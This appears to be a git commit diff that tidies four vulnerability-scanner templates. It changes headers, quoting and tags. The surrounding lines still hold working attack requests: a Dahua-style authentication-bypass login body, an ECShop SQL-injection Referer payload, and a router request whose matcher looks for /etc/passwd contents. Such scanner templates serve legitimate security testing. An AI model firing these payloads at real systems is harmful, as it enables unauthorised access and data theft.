misc updates

patch-1
sandeep 2021-11-08 15:45:54 +05:30
parent c51bbf8715
commit cb74944f43
4 changed files with 9 additions and 15 deletions

View File

@ -25,8 +25,8 @@ requests:
Connection: close
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://{{Hostname}}/
Referer: http://{{Hostname}}/
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
@ -40,10 +40,10 @@ requests:
- type: word
part: body
words:
- "\"result\":true"
- "id"
- "params"
- "session"
- '"result":true'
- 'id'
- 'params'
- 'session'
condition: and
extractors:

View File

@ -6,7 +6,7 @@ info:
severity: high
metadata:
shodan-query: 'pentaho'
tags: pentaho,default-login,panel
tags: pentaho,default-login
requests:
- raw:

View File

@ -7,7 +7,7 @@ info:
reference:
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
tags: sqli,php,cms,ecshop
tags: sqli,php,ecshop
requests:
- raw:
@ -15,10 +15,7 @@ requests:
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
matchers:
- type: word

View File

@ -13,9 +13,6 @@ requests:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/diagnostic.html?t=201701020919
Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
@ -26,9 +23,9 @@ requests:
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
part: body
- type: status
status: